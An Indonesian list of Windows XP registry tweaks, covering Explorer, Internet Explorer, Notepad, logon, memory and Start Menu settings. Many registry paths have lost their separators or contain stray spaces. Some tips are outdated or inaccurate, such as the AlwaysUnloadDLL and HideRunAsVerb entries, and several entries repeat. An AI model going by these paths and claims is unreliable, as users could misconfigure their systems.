Klik ganda NoLowDiskSpaceChecks dan masukkan angka 1 pada Value Data.

Menonaktifkan Menu Properties My Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
Jika key Explorer tidak ada, buat yang baru dengan mengklik menu Edit > New > Key dan beri nama Explorer.

Mengubah Ukuran CoolSwitch
(Coba Tekan Alt+Tab, itulah yang disebut dengan CoolSwitch)
HKEY_CURRENT_USER/Control Panel/Desktop
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik CoolSwitchColumns dan aturlah seberapa panjang CoolSwitch ini akan ditampilkan dengan memasukkan angka yang diinginkan pada Value Data.
Kemudian klik CoolSwitchRows dan lakukan hal yang serupa.

Menonaktifkan Fungsi CoolSwitch
HKEY_CURRENT_USER/Control Panel/Desktop
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda pada CoolSwitch dan masukkan angka 0.

Menonaktifkan Animasi Pada Windows XP
HKEY_CURRENT_USER/Control Panel/Desktop/WindowMetrics
Klik ganda pada MinAnimate dan masukkan angka 1 untuk menonaktifkan, dan 0 untuk mengaktifkannya kembali.

Mengubah Tombol Kiri Menjadi Tombol Kanan Pada Mouse
HKEY_CURRENT_USER/Control Panel/Mouse
Klik ganda pada SwapMouseButtons dan beri angka 1 pada Value Data.

Mengubah Gulungan Baris Pada Scroll Mouse
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda WheelScrollLines masukkan angka yang diinginkan (sesuai dengan baris yang hendak digulung) pada Value Data.

Menyembunyikan System Properties Pada Control Panel
HKEY_CURRENT_USER/Control Panel/don’t load
Buatlah sebuah String Value baru dan beri nama sysdm.cpl.
Klik ganda sysdm.cpl dan masukkan input Yes pada bagian Value Data.

Menonaktifkan Display Properties
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies
Pada bagian subkey Policies, buat sebuah key baru dengan cara Edit > New > Key dan beri nama System.
Kemudian di subkey System, buatlah sebuah DWORD Value baru dan beri nama NoDispCPL.
Klik ganda NoDispCPL dan masukkan angka 1 pada Value Data.

Mengatur Kecepatan Repeat Rate Keyboard
HKEY_CURRENT_USER/Control Panel/Keyboard
Klik ganda KeyboardSpeed dan masukkan nilai yang diinginkan. Semakin tinggi angkanya, semakin cepat pula Repeat Rate-nya.

Teks Bergaris Bawah Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda lfUnderline dan masukkan angka 1 pada Value Data.

Mode Word Wrap Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda fWrap dan masukkan angka 1 pada Value Data.

Status Bar Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda StatusBar dan masukkan angka 1 pada Value Data.

DVD Di Windows Media Player
HKEY_CURRENT_USER/Software/Microsoft/MediaPlayer/Player/Settings
Pilih menu Edit > New > String Value dan beri nama DVDUI.
Klik ganda DVDUI dan masukkan teks Yes pada Value Data.

Menambah Identitas Windows Media Player
HKEY_CURRENT_USER/Software/Policies/Microsoft
HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows
Klik Edit > New > Key dan beri nama WindowsMediaPlayer.
Klik Edit > New > String Value dan beri nama TitleBar.
Klik ganda TitleBar dan masukkan teks yang diinginkan pada Value Data.

Mengubah Tombol Stop Menjadi Tombol Play Pada Windows Media Player
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/MediaPlayer/Objects/StopButton
Klik ganda onclick dan masukkan teks player.controls.play() pada Value Data.

Memilih Pemutar CD Audio Default
HKEY_CLASSES_ROOT/AudioCD/Shell/Play/Command
Klik ganda (Default) dan masukkan path software yang anda inginkan sebagai pemutar CD Audio secara default. Misalnya: C:Program FilesWindows Media Playerwmplayer.exe

Mengembalikan Akses Ke CD-ROM
Setelah menguninstall sebuah program pembakar CD, adakalanya CD-ROM tidak bisa lagi diakses, solusinya:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lClass{4D36E965-E325-11CE-BFC1-08002BE10318}
Hapus subkey LowerFilters dan UpperFilters dengan menekan tombol Del.

Memperkecil Ukuran Thumbnail Untuk Windows Explorer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Pilih menu Edit > New > Binary Value dan beri nama ThumbnailSize.
Klik ganda ThumbnailSize dan masukkan angka 20 pada Value Data.

Membuat Shortcut Menu Pribadi Di Windows Explorer
HKEY_CLASSES_ROOT/Drive/Shell
Pilih Edit > New > Key dan beri nama Winamp sebagai contohnya.
Klik ganda option (Default) disisi kanan registry editor dan masukkan teks Winamp.
Klik subkey Winamp dan pilih menu Edit > New > Key dan beri nama Command.
Klik ganda option (Default) dan masukkan path C:Program FilesWinampWinamp.exe pada Value Data.

Enkripsi Melalui Menu Konteks
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Buat sebuah DWORD Value baru dan beri nama EncryptionContextMenu.
Klik ganda EncryptionContextMenu dan masukkan angka 1 pada Value Data.

Mengganti Ikon Pada Drives
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorer
Jika belum ada, pilih Edit > New > Key dan beri nama sesuai dengan drive yang diinginkan [contohnya: C untuk drive C:] Pada value tersebut, buat sebuah Key baru lagi dan beri nama DefaultIcon.
Klik ganda option (Default) dan masukkan path tempat ikon berada (contohnya: D:DocumentsC Drive Icon.ico)

Menyembunyikan Drive
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Pilih Edit > New > DWORD Value dan beri nama NoDrives.
Klik ganda NoDrives dan tentukan drive mana yang ingin dihilangkan pada Value Data.
Contoh: jika ingin menghilangkan drive E:, masukkan angka 16 pada Value Data.
Kombinasi angka pada Value Data adalah sebagai berikut:
A: > 1
B: > 2
C: > 4
D: > 8
E: > 16
F: > 32
G: > 64
H: > 128
I: > 256
J: > 512
K: > 1024
L: > 2048
M: > 4096
Semua: > 67108863

Membuat Tip Of The Day Windows Explorer
Untuk mengaktifkannya buka Windows Explorer kemudian pilih menu View > Explorer Bar > Tip of the Day.
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Tips
Di jendela sebelah kanan akan terlihat deretan tip-tip yang tersimpan dalam value 0 – 49.
Dua hal yang bisa dilakukan adalah mengganti tip-tip yang dengan klik ganda masing-masing value dengan teks yang diinginkan.
Kedua adalah menambah tip-tip baru dimulai dengan urutan setelah value 49 (misalnya 50 dst.).
Pilih Edit > New > String Value dan beri nama berbentuk angka yang melanjutkan angka terakhir pada tip (misalnya 50 dst.).
Klik ganda pada value yang baru tersebut dan isikan dengan teks yang diinginkan pada Value Data.

Menyembunyikan Advanced Settings Pada Folder Options Windows Explorer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer
Dibawah key Explorer akan ditemukan subkey bernama Advanced. Klik kanan dan pilih Rename. Ubah nama Advanced menjadi Advancedx.

Kode Curang Bermain Game Hearts
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Applets
Klik menu Edit > New > Key dan beri nama Hearts.
Klik menu Edit > New > String Value dan beri nama ZB dan isikan angka 42 pada Value Data.
Buka game Hearts pada Start Menu > All Programs > Games. Setelah memasukkan nama pemain, tekan kombinasi tombol berikut:
Ctrl+Shift+Alt+F12 dan semua kartu akan terbuka.

Membersihkan Sampah Registry
HKEY_CLASSES_ROOT/Application
HKEY_CURRENT_USER/Software
HKEY_LOCAL_MACHINE/SOFTWARE
Pilih salah satu subkey yang merupakan nama software yang ingin dihapus, kemudian tekan tombol Del.

Membersihkan Sampah Uninstall
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
Hapus subkey yang memiliki nama yang sama dengan software yang telah di-uninstall.

Menghapus Daftar Program Yang Tidak Diinginkan
Dari Add/Remove Programs
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Uninstall
Hapus subkey yang berisikan program yang tidak diinginkan dengan menekan tombol Del.

Menjalankan Program Saat StartUp
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
Pilih menu Edit > New > String Value dengan nama Winamp misalnya.
Klik ganda pada value tersebut dan masukkan path tempat program tersebut terinstall (C:Program FilesWinampWinamp.exe).

Menghapus StartUp Items Di MSCONFIG
Klik Start > Run > ketik msconfig, kemudian klik pada tab startup, hilangkan tanda centang pada program yang ingin dihapus dari daftar startup.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionRun
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurre ntVersionRun
Hapus subkey yang berisikan program-program yang tidak diinginkan dengan menekan tombol Del.

Mempercepat Proses Shutdown Windows XP
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control
Klik ganda WaitToKillServiceTimeout dan ubah nilainya menjadi lebih rendah dari 2000.

Mengganti AM Dan PM Menjadi Pagi Dan Sore
HKEY_CURRENT_USER/Control Panel/International
Klik ganda s1159 dan ubah teks AM dengan PAGI.
klik ganda s2359 dan ubah teks PM dengan SORE.

Menonaktifkan Fungsi AutoRun
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik ganda NoDriveTypeAutoRun dan masukkan angka 95 pada Value Data.

Mematikan Secara Otomatis Program Not Responding
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Memunculkan Option My Computer Yang Tersembunyi
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/0
Klik ganda Flags kemudian ganti menjadi Decimal dan masukkan angka 1 pada Value Data.

Menonaktifkan Fungsi New Window Di Internet Explorer
HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions
Buat sebuah DWORD Value baru dan beri nama NoOpeninNewWnd.
Klik ganda NoOpeninNewWnd dan masukkan 1 pada Value Data.

Mengganti Background Toolbar Internet Explorer
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Toolbar
Pilih menu Edit > New > String Value dan beri nama BackBitmap.
Klik ganda BackBitmap dan isikan dengan path tempat gambar bitmap (.bmp) yang akan menjadi background toolbar berada pada Value Data.
Contohnya: C:WINDOWSWallpaper.bmp

Mengganti Versi Internet Explorer
Untuk mengetahui versi Internet Explorer yang dimiliki: Help > About Internet Explorer pada browser Internet Explorer.
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer
Klik ganda Version dan masukkan angka yang diinginkan pada Value Data.

Mengecek ProductID Internet Explorer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Registration
Lihat ProductID pada key ProductId, pada value tersebut akan tercatat berapa ProductID Internet Explorer yang digunakan.

Mode Full Screen Pada Internet Explorer
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
Klik ganda FullScreen dan masukkan teks Yes pada Value Data.

Mengganti Title Internet Explorer
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
Pilih menu Edit > New > String Value dan beri nama Window Title.
Klik ganda Window Title dan masukkan teks yang diinginkan pada Value Data.

Membersihkan Daftar URL Pada Internet Explorer
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs
Hapus value url1, url2 dan seterusnya dengan menekan tombol Del.

Menyembunyikan Tombol Go Pada Internet Explorer
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
Pilih menu Edit > New > String Value dan beri nama ShowGoButton.
Klik ganda ShowGoButton dan masukkan angka 0 pada Value Data.

Mengganti Nama Ikon Internet Explorer
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerCLSID{871C5380-42A0-1069-A2EA-08002B30309D} Klik ganda pada value (Default) disamping kanan, masukkan teks yang diinginkan pada Value Data.

Menambahkan Domain .Gov Pada Pencarian Website
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/UrlTemplate
Pilih Edit > New > String Value dan beri nama dengan angka yang merupakan kelanjutan dari angka-angka yang sudah ada.
Klik ganda pada value tersebut dan ketik %s.gov pada Value Data.

Tweaking Memory Pada Windows XP
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management
Klik ganda pada DisablePagingExecutive dan masukkan angka 1 pada Value Data.
Apabila diaktifkan,Windows tidak akan melakukan paging file ke dalam hard disk. Sistem operasi dan program-program menjadi lebih responsif. Disarankan untuk komputer yang memiliki memori lebih dari 128MB.
Klik ganda pada LargeSystemCache dan masukkan angka 1 pada Value Data.
Jika diaktifkan, sistem akan mengalokasikan seluruh memori (kecuali 4 MB untuk disk caching) untuk file caching. Komputer akan melakukan caching kernel XP di dalam memory sehingga Windows XP dapat berjalan lebih cepat.

Unload .dll Untuk Mempercepat Akses Memori
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorer
Pilih menu Edit > New > Key dan beri nama AlwaysUnloadDLL.
Pada option Default Value masukkan angka 1.

Menghapus Pagefile Saat Shut Down
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerMemory Management Klik ganda ClearPageFileAtShutdown dan masukkan angka 1 pada Value Data.

Memindahkan Pagefile
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management
Klik ganda PagingFiles kemudian ganti path ke lokasi baru yang diinginkan.
Misalnya: D:pagefile.sys 1024 1024

Mengembalikan Fungsi Search Kedalam Tampilan Lama
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/CabinetState
Pilih menu Edit > New > String Value dan beri nama UseSearchAsst.
Klik ganda UseSearchAsst dan masukkan angka 1 pada Value Data.

Menyembunyikan Device Manager
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies
Pilih menu Edit > New > Key dan beri nama System.
Di subkey System buatlah sebuah DWORD Value baru dan beri nama NoDevMgrPage.
Klik ganda NoDevMgrPage dan masukkan angka 1 pada Value Data.

Mengoptimalkan Hard Disk Disaat Komputer Dalam Keadaan Idle
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionOptimalLayout
Buatlah sebuah DWORD Value Baru dan beri nama EnableAutoLayout.
Klik ganda EnableAutoLayout dan masukkan angka 1 pada Value Data.

Menghilangkan Opsi Run As Pada Menu Konteks
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buatlah sebuah DWORD Value baru dan beri nama HideRunAsVerb.
Klik ganda HideRunAsVerb dan masukkan angka 0 pada Value Data.

Menonaktifkan Windows XP Tour
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionAppletsTour
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionAppletsTour
Buatlah sebuah DWORD Value baru jika belum ada dan beri nama RunCount.
Klik ganda RunCount dan masukkan angka 0 pada Value Data.

Menyimpan Perubahan Pada Konfigurasi Notepad
HKEY_CURRENT_USERSoftwareMicrosoftNotepad
Buatlah masing-masing DWORD Value baru dan beri nama fSavePageSettings dan fSaveWindowPositions.
Klik ganda pada fSavePageSettings dan fSaveWindowPositions dan masukkan angka 1 pada masing-masing Value Data.

Informasi Terperinci Di Device Manager
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerEnvironment
Buatlah sebuah String Value baru atau ubah String Value yang telah ada yang bernama DEVMGR_SHOW_DETAILS.
Klik ganda DEVMGR_SHOW_DETAILS dan masukkan angka 1 pada Value Data.

Menunjukkan Semua Hidden Devices Pada Device Manager
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerEnvironment
Buatlah sebuah String Value baru dan beri nama DEVMGR_SHOW_NONPRESENT_DEVICES.
Klik ganda DEVMGR_SHOW_NONPRESENT_DEVICES dan masukkan angka 1 pada Value Data.

Menonaktifkan Task Manager
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesSystem
Buatlah DWORD Value baru dan beri nama DisableTaskMgr.
Klik ganda DisableTaskMgr dan masukkan 1 pada Value Data.

Menggunakan Smooth Scrolling Di Internet Explorer
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
Jika belum ada, buatlah sebuah DWORD Value baru dan beri nama SmoothScroll.
Klik ganda SmoothScroll dan masukkan angka 1 pada Value Data.

Menonaktifkan Image Preview Menggunakan Windows Picture & Fax Viewer
HKEY_CLASSES_ROOTSystemFileAssociationsimageShe llExContextMenuHandlersShellImagePreview
Klik ganda pada value Default dan kosongkan nilainya (hapus {e84fda7c-1d6a-45f6-b725-cb260c236066})

Mengubah Setting Thumbnail
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionExplorer
Jika belum ada, buatlah sebuah DWORD Value baru dan beri nama ThumbnailSize dan ThumbnailQuality.
Klik ganda ThumbnailSize dan masukkan nilai yang diinginkan sesuai dengan ukuran dalam piksel.
Klik ganda ThumbnailQuality dan masukkan nilai yang diinginkan sesuai dengan persentasi kualitasnya (50% – 100%).

Menonaktifkan Cache Pada Thumbnail
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
Buat sebuah DWORD Value baru dan beri nama DisableThumbnailCache.
Klik ganda DisableThumbnailCache dan masukkan 1 pada Value Data.

Mengubah Warna Pada File Yang Terenkripsi
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorer
Buat sebuah Binary Value baru dan beri nama AltEncryptionColor.
Klik ganda AltEncryptionColor dan masukkan input warna RGB yang diinginkan.
Hints: RR GG BB 00 (Default 00 80 40 00)

Mengubah Warna Pada File Dan Folder Terkompresi
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorer
Buat sebuah Binary Value baru jika belum tersedia dan beri nama AltColor.
Klik ganda AltColor dan masukkan input warna RGB yang diinginkan.
Hints: RR GG BB 00 (Default 00 00 ff 00)
Note: Untuk mengaktifkan fitur ini pada Folder Options beri tanda centang Show encrypted or compressed NTFS in color.

Warna Alternatif Pada File Terkompresi
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
Buat sebuah DWORD Value baru dan beri nama ShowCompColor.
Klik ganda ShowCompColor dan masukkan 1 pada Value Data.

Menonaktifkan Web Content Di Explorer Dan Desktop
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama ClassicShell.
Klik ganda ClassicShell dan masukkan angka 1 pada Value Data.

Menyingkirkan My Computer Dari Desktop Dan Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesNonEnum
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesNonEnum
Buat sebuah DWORD Value baru jika belum ada dan beri nama {20D04FE0-3AEA-1069-A2D8-08002B30309D}.
Klik ganda {20D04FE0-3AEA-1069-A2D8-08002B30309D} dan masukkan 1 pada Value Data.

Memilih Ikon Desktop Yang Pertama
HKEY_CLASSES_ROOTCLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}
Buat sebuah DWORD Value baru dan beri nama SortOrderIndex.
Klik ganda SortOrderIndex dan masukkan nilai berikut pada Value Data sebagai pilihan:
48 > My Documents
54 > My Computer

Menunjukkan Versi Windows Di Desktop
HKEY_CURRENT_USERControl PanelDesktop
Buatlah sebuah DWORD Value baru jika belum ada dan beri nama PaintDesktopVersion.
Klik ganda PaintDesktopVersion dan masukkan 1 pada Value Data.

Menunjukkan Pop-up Descriptions Di Explorer Dan Item Dekstop
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
Buat sebuah DWORD Value baru jika belum ada dan beri nama ShowInfoTip.
Klik ganda ShowInfoTip dan masukkan 1 pada Value Data.

Menonaktifkan Desktop Cleanup Wizard
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerDesktopCleanupWiz
Buat sebuah DWORD Value baru dan beri nama NoRun.
Klik ganda NoRun dan masukkan angka 1 pada Value Data.

Menyembunyikan Ikon Internet Explorer
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoInternetIcon.
Klik ganda NoInternetIcon dan masukkan angka 1 pada Value Data.

Menyingkirkan My Documents Dari Desktop
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerCLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}ShellFolder
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionExplorerCLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}ShellFolder
Ubah nilai dalam key Attributes menjadi 0xf0500174. Tekan F5 untuk melihat hasilnya.

Menghapus Langsung Tanpa Menggunakan Recycle Bin
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoRecycleFiles.
Klik ganda NoRecycleFiles dan masukkan angka 1 pada Value Data.

Menonaktifkan Recycle Bin
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorerBitBucket
Buat sebuah DWORD Value baru dan beri nama NukeOnDelete.
Klik ganda NukeOnDelete dan masukkan angka 1 pada Value Data.

Mengaktifkan Advanced File System And Sharing Security
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lLsa
Buat sebuah DWORD Value baru dan beri nama ForceGuest.
Klik ganda ForceGuest dan masukkan 0 pada Value Data.

Menonaktifkan NTFS Last Access Time Stamp
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lFileSystem
Buat sebuah DWORD Value baru jika belum ada dan beri nama NtfsDisableLastAccessUpdate.
Klik ganda NtfsDisableLastAccessUpdate dan masukkan angka 1 pada Value Data.

Menonaktifkan 8.3 Name Creation (NTFS)
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lFileSystem
Buatlah sebuah DWORD Value baru dan beri nama NtfsDisable8dot3NameCreation.
Klik ganda NtfsDisable8dot3NameCreation dan masukkan angka 1 pada Value Data.

Mengaktifkan Dukungan 48-bit LBA Untuk Harddisk Berkapasitas Besar
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esAtapiParameters
Buat sebuah DWORD Value baru dan beri nama EnableBigLba.
Klik ganda EnableBigLba dan masukkan angka 1 pada Value Data.
Note: Hanya untuk pengguna Windows XP sebelum SP1.

Menonaktifkan Fungsi CD Burning
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value dan beri nama NoCDBurning.
Klik ganda NoCDBurning dan masukkan angka 1 pada Value Data.

Mengubah Jendela Logon
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah DWORD Value baru dan beri nama LogonType.
Klik ganda LogonType dan masukkan value sebagai berikut pada Value Data:
0 > Classic Mode
1 > Welcome Screen

Mengaktifkan Fast User Switching
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah DWORD Value dan beri nama AllowMultipleTSSessions.
Klik ganda AllowMultipleTSSessions dan masukkan angka 1 pada Value Data.

Mengaktifkan Monitor Power-off Di Jendela Logon
HKEY_USERS.DEFAULTControl PanelDesktop
Klik ganda PowerOffActive dan ScreenSaveActive dan masukkan angka 1 pada masing-masing Value Data.
Klik ganda SCRNSAVE.EXE masukkan teks (None) pada Value Data.
HKEY_USERS.DEFAULTControl PanelPowerCfg
Klik ganda CurrentPowerPolicy dan masukkan angka 0 pada Value Data.

Menonaktifkan Passport Balloon Reminder
HKEY_CURRENT_USERSoftwareMicrosoftMessengerServ ice
Buat sebuah Binary Value baru dan beri nama PassportBalloon.
Klik ganda PassportBalloon dan masukkan input 0a 00 00 00 pada Value Data.

Mengubah Wallpaper Di Jendela Logon
HKEY_USERS.DEFAULTControl PanelDesktop
Ubah nilai key Wallpaper dan masukkan path tempat lokasi file bitmap (.bmp) yang diinginkan. (contoh: D:/Documents/Wallpaper.bmp)

Membatasi Jumlah Login Otomatis
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah DWORD Value baru dan beri nama AutoLogonCount.
Klik ganda AutoLogonCount dan masukkan angka sesuai dengan batasan jumlah login yang diinginkan.

Kotak Dialog Sebelum Logon
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Klik ganda LegalNoticeCaption dan masukkan input teks judul yang diinginkan (contoh: WARNING).
Klik ganda LegalNoticeText dan masukkan input teks yang diinginkan (contoh: Do Not Attempt to Logon to this system unless you are an authorized user).

Kustomisasi Windows Logon Dan Judul Dialog Keamanan
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah String Value baru dan beri nama Welcome.
Klik ganda Welcome dan masukkan input teks yang diinginkan.

Memaksa penggunaan Login Otomatis
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah String Value baru dan beri nama ForceAutoLogon.
Klik ganda ForceAutoLogon dan masukkan angka 1 pada Value Data.

Menonaktifkan Login Otomatis Lewat Penggunaan Tombol Shift
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah String Value baru dan beri nama IgnoreShiftOverride.
Klik ganda IgnoreShiftOverride dan masukkan angka 1 pada Value Data.

Menyembunyikan Usernames Dari Jendela Logon
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t
Buat sebuah DWORD Value baru dan beri nama sesuai dengan username yang diinginkan.
Klik ganda pada value tersebut dan masukkan angka 0 pada Value Data.

Mengaktifkan Start Menu Scrolling
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionExplorerAdvanced
Buat sebuah String Value baru dan beri nama StartMenuScrollPrograms.
Klik ganda StartMenuScrollPrograms dan masukkan input Yes pada Value Data.

Melenyapkan Opsi Undock Computer Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoStartMenuEjectPC.
Klik ganda NoStartMenuEjectPC dan masukkan angka 1 pada Value Data.

Modifikasi Start Menu Folders
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
Buat beberapa DWORD Value jika belum tersedia dan beri nama antara lain Start_ShowControlPanel, Start_ShowMyComputer, Start_ShowMyDocs, Start_ShowMyMusic, Start_ShowMyPics dan Start_ShowNetConn.
Start_ShowControlPanel – Control Panel
Start_ShowMyComputer – My Computer
Start_ShowMyDocs – My Documents
Start_ShowMyMusic – My Music
Start_ShowMyPics – My Pictures
Start_ShowNetConn – Network Connections
Klik ganda pada masing-masing key dan berikan value pilihan sebagai berikut:
0 = Hidden
1 = Open When Clicked
2 = Expand Contents

Menyingkirkan Program Access And Defaults Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoSMConfigurePrograms.
Klik ganda NoSMConfigurePrograms dan masukkan angka 1 pada Value Data.

Menyingkirkan Menu Disconnect Item
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Buat sebuah DWORD Value dan beri nama NoDisconnect.
Klik ganda NoDisconnect dan masukkan angka 1 pada Value Data.

Menghapus Jejak Di Menu Run
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerRunMRU
Hapus beberapa key yang diinginkan dengan menekan tombol Del.

Mengaktifkan Favorites Di Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvanced
Buat sebuah DWORD Value baru dan beri nama StartMenuFavorites.
Klik ganda StartMenuFavorites dan masukkan angka 1 pada Value Data.

Menonaktifkan Passport Balloon Reminder
HKEY_CURRENT_USERSoftwareMicrosoftMessengerService
Buat sebuah Binary Value baru dan beri nama PassportBalloon.
Klik ganda PassportBalloon dan masukkan input 0a 00 00 00 pada Value Data.

Menyembunyikan Usernames Dari Jendela Logon
